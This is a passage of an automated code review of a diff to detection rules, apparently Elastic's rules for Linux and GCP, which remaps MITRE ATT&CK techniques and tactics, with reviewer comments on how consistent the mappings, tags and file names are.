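Review bot: The rewritten `tags` array is collapsed onto a single ~200-character line whereas the removed form used one entry per line, and every other tags array in this commit gets the same treatment. These files are presumably normalized by the repo's TOML writer, which would re-wrap long arrays and produce a noisy follow-up diff. Keeping the multi-line layout, `tags = [` followed by one quoted entry per line with a trailing comma, matches the previous formatting and keeps the per-tag diff readable.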
@@ -220,24 +210,39 @@ name = "RC Scripts" reference = "https://attack.mitre.org/techniques/T1037/004/" [[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" [[rule.threat.technique.subtechnique]] -id = "T1547.006" -name = "Kernel Modules and Extensions" -reference = "https://attack.mitre.org/techniques/T1547/006/" +id = "T1053.003" +name = "Cron" +reference = "https://attack.mitre.org/techniques/T1053/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.006" +name = "Systemd Timers" +reference = "https://attack.mitre.org/techniques/T1053/006/" [[rule.threat.technique]] -id = "T1136" -name = "Create Account" -reference = "https://attack.mitre.org/techniques/T1136/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [[rule.threat.technique.subtechnique]] -id = "T1136.001" -name = "Local Account" -reference = "https://attack.mitre.org/techniques/T1136/001/" +id = "T1098.004" +name = "SSH Authorized Keys" +reference = "https://attack.mitre.org/techniques/T1098/004/" + +[[rule.threat.technique]] +id = "T1542" +name = "Pre-OS Boot" +reference = "https://attack.mitre.org/techniques/T1542/" + +[[rule.threat.technique.subtechnique]] +id = "T1542.003" +name = "Bootkit" +reference = "https://attack.mitre.org/techniques/T1542/003/" [[rule.threat.technique]] id = "T1543" 
@@ -249,11 +254,46 @@ id = "T1543.002" name = "Systemd Service" reference = "https://attack.mitre.org/techniques/T1543/002/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.004" +name = "Unix Shell Configuration Modification" +reference = "https://attack.mitre.org/techniques/T1546/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.017" +name = "Udev Rules" +reference = "https://attack.mitre.org/techniques/T1546/017/" + +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.006" +name = "Kernel Modules and Extensions" +reference = "https://attack.mitre.org/techniques/T1547/006/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.013" +name = "XDG Autostart Entries" +reference = "https://attack.mitre.org/techniques/T1547/013/" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.003" +name = "Pluggable Authentication Modules" +reference = "https://attack.mitre.org/techniques/T1556/003/" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" @@ -272,16 +312,6 @@ reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" - -[[rule.threat.technique.subtechnique]] -id = "T1053.003" -name = "Cron" -reference = "https://attack.mitre.org/techniques/T1053/003/" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" 
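Review bot: The second hunk on this line drops T1053 from the Privilege Escalation entry, so cron and systemd-timer modifications are now mapped under Persistence only, while the GCP rules in this same commit deliberately list T1098.003 under both Persistence and Privilege Escalation; the two parts of the commit apply opposite de-duplication policies. Cron and timer files are commonly edited precisely to get code run as root, so keeping `[[rule.threat.technique]]` / `id = "T1053"` under TA0004 as well would be consistent with the GCP choice. If the intent is instead one tactic per technique repo-wide, the GCP duplicates are the ones to trim.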
@@ -296,29 +326,3 @@ reference = "https://attack.mitre.org/techniques/T1548/003/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/gcp/collection_gcp_pub_sub_topic_creation.toml b/rules/integrations/gcp/collection_gcp_pub_sub_topic_creation.toml index 2f2e473a30c..f97dd000f8a 100644 --- a/rules/integrations/gcp/collection_gcp_pub_sub_topic_creation.toml +++ b/rules/integrations/gcp/collection_gcp_pub_sub_topic_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/23" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -82,16 +82,3 @@ event.dataset:gcp.audit and event.action:google.pubsub.v*.Publisher.CreateTopic ''' -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1530" -name = "Data from Cloud Storage" -reference = "https://attack.mitre.org/techniques/T1530/" - - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - diff --git a/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_created.toml b/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_created.toml index 6999cef9783..b7893e2fc97 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_created.toml 
+++ b/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_created.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -87,14 +87,18 @@ event.dataset:gcp.audit and event.action:(*.compute.firewalls.insert or google.a [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.007" +name = "Disable or Modify Cloud Firewall" +reference = "https://attack.mitre.org/techniques/T1562/007/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_deleted.toml b/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_deleted.toml index 6ac6b9d0085..dc90f3eb665 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_deleted.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -84,14 +84,18 @@ event.dataset:gcp.audit and event.action:(*.compute.firewalls.delete or google.a [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.007" +name = "Disable or Modify Cloud Firewall" +reference = "https://attack.mitre.org/techniques/T1562/007/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - 
diff --git a/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_modified.toml b/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_modified.toml index 3afdc0d904e..8e59ea4e070 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_modified.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_modified.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -87,14 +87,18 @@ event.dataset:gcp.audit and event.action:(*.compute.firewalls.patch or google.ap [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.007" +name = "Disable or Modify Cloud Firewall" +reference = "https://attack.mitre.org/techniques/T1562/007/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/gcp/defense_evasion_gcp_logging_bucket_deletion.toml b/rules/integrations/gcp/defense_evasion_gcp_logging_bucket_deletion.toml index 0959ed9e33e..427c2ce5776 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_logging_bucket_deletion.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_logging_bucket_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -84,14 +84,18 @@ event.dataset:gcp.audit and event.action:google.logging.v*.ConfigServiceV*.Delet [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/gcp/defense_evasion_gcp_logging_sink_deletion.toml b/rules/integrations/gcp/defense_evasion_gcp_logging_sink_deletion.toml index 36bd43f1c07..38802e77eaa 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_logging_sink_deletion.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_logging_sink_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/18" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -81,14 +81,18 @@ event.dataset:gcp.audit and event.action:google.logging.v*.ConfigServiceV*.Delet [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/gcp/defense_evasion_gcp_pub_sub_subscription_deletion.toml b/rules/integrations/gcp/defense_evasion_gcp_pub_sub_subscription_deletion.toml index b232902cc6d..3f132004437 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_pub_sub_subscription_deletion.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_pub_sub_subscription_deletion.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/09/23" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -64,14 +64,7 @@ references = ["https://cloud.google.com/pubsub/docs/overview"] risk_score = 21 rule_id = "cc89312d-6f47-48e4-a87c-4977bd4633c3" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: GCP", - "Data Source: Google Cloud Platform", - "Use Case: Log Auditing", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Impact", "Data Source: GCP", "Data Source: Google Cloud Platform", "Use Case: Log Auditing", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -82,14 +75,13 @@ event.dataset:gcp.audit and event.action:google.pubsub.v*.Subscriber.DeleteSubsc [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/integrations/gcp/defense_evasion_gcp_pub_sub_topic_deletion.toml b/rules/integrations/gcp/defense_evasion_gcp_pub_sub_topic_deletion.toml index 01e2afac043..796f221eb75 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_pub_sub_topic_deletion.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_pub_sub_topic_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/18" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
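Review bot: Moving this rule to Impact/T1485 discards the log-pipeline angle that its retained `Use Case: Log Auditing` tag still advertises: deleting the Pub/Sub subscription that feeds a SIEM or log export is typically done to blind monitoring, which is Disable or Modify Cloud Logs (T1562.008) under Defense Evasion rather than data destruction. Consider keeping a Defense Evasion entry alongside Impact, e.g. a second `[[rule.threat]]` carrying `id = "T1562.008"` under the parent T1562, and add `"Tactic: Defense Evasion"` back to `tags` so tags and tactics agree. The file name still starts with `defense_evasion_`, which no longer matches the only tactic mapped.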
@@ -65,14 +65,7 @@ references = ["https://cloud.google.com/pubsub/docs/overview"] risk_score = 21 rule_id = "3202e172-01b1-4738-a932-d024c514ba72" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: GCP", - "Data Source: Google Cloud Platform", - "Use Case: Log Auditing", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Impact", "Data Source: GCP", "Data Source: Google Cloud Platform", "Use Case: Log Auditing", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -83,14 +76,13 @@ event.dataset:gcp.audit and event.action:google.pubsub.v*.Publisher.DeleteTopic [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/integrations/gcp/defense_evasion_gcp_storage_bucket_permissions_modified.toml b/rules/integrations/gcp/defense_evasion_gcp_storage_bucket_permissions_modified.toml index 66e67424205..ae4dd9b718b 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_storage_bucket_permissions_modified.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_storage_bucket_permissions_modified.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
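Review bot: After this hunk the only tactic is Impact, yet the file keeps its `defense_evasion_gcp_pub_sub_topic_deletion.toml` name and the `Use Case: Log Auditing` tag; if topic deletion matters mainly because it severs audit-log export, T1562.008 under Defense Evasion fits better than, or in addition to, T1485. Rule files in this directory appear to be prefixed by their primary tactic, so either rename to `impact_gcp_pub_sub_topic_deletion.toml` or retain a Defense Evasion entry so the prefix stays truthful. The `rule_id` is unchanged, so a rename should not affect installed rules, though any repo check on file naming should be confirmed.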
@@ -64,14 +64,7 @@ references = ["https://cloud.google.com/storage/docs/access-control/iam-permissi risk_score = 47 rule_id = "2326d1b2-9acf-4dee-bd21-867ea7378b4d" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: GCP", - "Data Source: Google Cloud Platform", - "Use Case: Identity and Access Audit", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: GCP", "Data Source: Google Cloud Platform", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -82,14 +75,36 @@ event.dataset:gcp.audit and event.action:"storage.setIamPermissions" and event.o [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1222" -name = "File and Directory Permissions Modification" -reference = "https://attack.mitre.org/techniques/T1222/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" 
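Review bot: T1098.003 (Additional Cloud Roles) describes granting roles to an adversary-controlled principal, but `storage.setIamPermissions` also covers binding `allUsers` or `allAuthenticatedUsers` to a bucket, the public-exposure case this rule is likely most valued for, and that scenario is not account manipulation. A sentence in the description acknowledging the exposure case, or a second mapping for it, would keep the technique honest; the duplicate T1098.003 block under TA0003 and TA0004 is otherwise fine. The file still carries the `defense_evasion_` prefix although no Defense Evasion entry remains.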
diff --git a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_network_deleted.toml b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_network_deleted.toml index 49efa174d6f..7763e3925b8 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_network_deleted.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_network_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/22" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -64,14 +64,7 @@ references = ["https://cloud.google.com/vpc/docs/vpc"] risk_score = 47 rule_id = "c58c3081-2e1d-4497-8491-e73a45d1a6d6" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: GCP", - "Data Source: Google Cloud Platform", - "Use Case: Configuration Audit", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Impact", "Data Source: GCP", "Data Source: Google Cloud Platform", "Use Case: Configuration Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -82,19 +75,13 @@ event.dataset:gcp.audit and event.action:v*.compute.networks.delete and event.ou [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.007" -name = "Disable or Modify Cloud Firewall" -reference = "https://attack.mitre.org/techniques/T1562/007/" - +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" 
diff --git a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_created.toml b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_created.toml index 8ae59e5172f..68be3764092 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_created.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_created.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/22" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -83,19 +83,18 @@ event.dataset:gcp.audit and event.action:(v*.compute.routes.insert or "beta.comp [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.007" -name = "Disable or Modify Cloud Firewall" -reference = "https://attack.mitre.org/techniques/T1562/007/" +[[rule.threat.technique]] +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_deleted.toml b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_deleted.toml index 2dbfe20dffd..61e82cd4529 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_deleted.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_deleted.toml 
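Review bot: T1578.005 (Modify Cloud Compute Configurations) is framed around compute sizing, quotas and regions, whereas this rule fires on `compute.routes.insert`, a VPC routing change, so the sub-technique looks like a reach; the alternative worth checking is T1599 (Network Boundary Bridging) under Defense Evasion, since a new route can bypass segmentation or steer traffic. If T1578.005 is kept, a one-line justification in the description would help the next reviewer; otherwise map to T1599 or the parent T1578 only. The removed T1562.007 was also a poor fit, so the change is an improvement either way.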
@@ -2,7 +2,7 @@ creation_date = "2020/09/22" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -83,19 +83,18 @@ event.dataset:gcp.audit and event.action:v*.compute.routes.delete and event.outc [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.007" -name = "Disable or Modify Cloud Firewall" -reference = "https://attack.mitre.org/techniques/T1562/007/" +[[rule.threat.technique]] +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/gcp/exfiltration_gcp_logging_sink_modification.toml b/rules/integrations/gcp/exfiltration_gcp_logging_sink_modification.toml index cff4a666a38..f75f349993b 100644 --- a/rules/integrations/gcp/exfiltration_gcp_logging_sink_modification.toml +++ b/rules/integrations/gcp/exfiltration_gcp_logging_sink_modification.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/22" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
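Review bot: The same T1578.005 mapping is applied here to `compute.routes.delete`, but deleting a route is a network-path change, not a compute-configuration change as that sub-technique is described; T1599 (Network Boundary Bridging) or the parent T1578 is the hedged alternative to verify. Whatever is chosen should match the companion `route_created` rule so the pair stays consistent.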
@@ -66,14 +66,7 @@ references = ["https://cloud.google.com/logging/docs/export#how_sinks_work"] risk_score = 21 rule_id = "184dfe52-2999-42d9-b9d1-d1ca54495a61" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: GCP", - "Data Source: Google Cloud Platform", - "Use Case: Log Auditing", - "Tactic: Exfiltration", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: GCP", "Data Source: Google Cloud Platform", "Use Case: Log Auditing", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -84,14 +77,18 @@ event.dataset:gcp.audit and event.action:google.logging.v*.ConfigServiceV*.Updat [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1537" -name = "Transfer Data to Cloud Account" -reference = "https://attack.mitre.org/techniques/T1537/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" [rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml b/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml index d26fdfad9fe..206d58ad008 100644 --- a/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml +++ b/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
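Review bot: Replacing Exfiltration/T1537 with Defense Evasion/T1562.008 drops the scenario the referenced `how_sinks_work` doc is about: an `UpdateSink` call can repoint the sink destination at a bucket or project the attacker controls, which is exactly Transfer Data to Cloud Account. Sink modification is dual-use, so keep both entries, i.e. retain the removed `[[rule.threat]]` with `id = "T1537"` under TA0010 next to the new T1562.008 block, and add `"Tactic: Exfiltration"` back to `tags` so tags and tactics agree. The file name still begins with `exfiltration_`, which would be misleading with only Defense Evasion mapped.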
@@ -64,14 +64,7 @@ references = ["https://cloud.google.com/iam/docs/understanding-custom-roles"] risk_score = 47 rule_id = "aa8007f0-d1df-49ef-8520-407857594827" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: GCP", - "Data Source: Google Cloud Platform", - "Use Case: Identity and Access Audit", - "Tactic: Initial Access", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: GCP", "Data Source: Google Cloud Platform", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" 
@@ -82,26 +75,36 @@ event.dataset:gcp.audit and event.action:google.iam.admin.v*.CreateRole and even [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/gcp/ml_gcp_error_message_spike.toml b/rules/integrations/gcp/ml_gcp_error_message_spike.toml index 5a8f5a9bd87..b73fbb0215c 100644 --- a/rules/integrations/gcp/ml_gcp_error_message_spike.toml +++ b/rules/integrations/gcp/ml_gcp_error_message_spike.toml @@ -4,7 +4,7 @@ integration = ["gcp"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2025/11/21" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 
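Review bot: `google.iam.admin.v*.CreateRole` only defines a custom role; it grants nothing until the role is bound to a principal, so T1098.003 (Additional Cloud Roles) under both Persistence and Privilege Escalation describes a later step than the event this rule records. It is still a better fit than the removed Initial Access/T1078 pairing, but a sentence in the description noting that the escalation materialises on the subsequent policy binding would keep the mapping honest. The file keeps its `initial_access_` prefix although no Initial Access entry remains.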
@@ -48,25 +48,12 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "a4b740e4-be17-4048-9aa4-1e6f42b455b1" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: GCP", - "Data Source: GCP Audit Logs", - "Data Source: Google Cloud Platform", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Discovery", "Tactic: Lateral Movement", "Tactic: Privilege Escalation", "Data Source: GCP", "Data Source: GCP Audit Logs", "Data Source: Google Cloud Platform", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" - [[rule.threat.technique]] id = "T1526" name = "Cloud Service Discovery" @@ -77,13 +64,10 @@ id = "T1580" name = "Cloud Infrastructure Discovery" reference 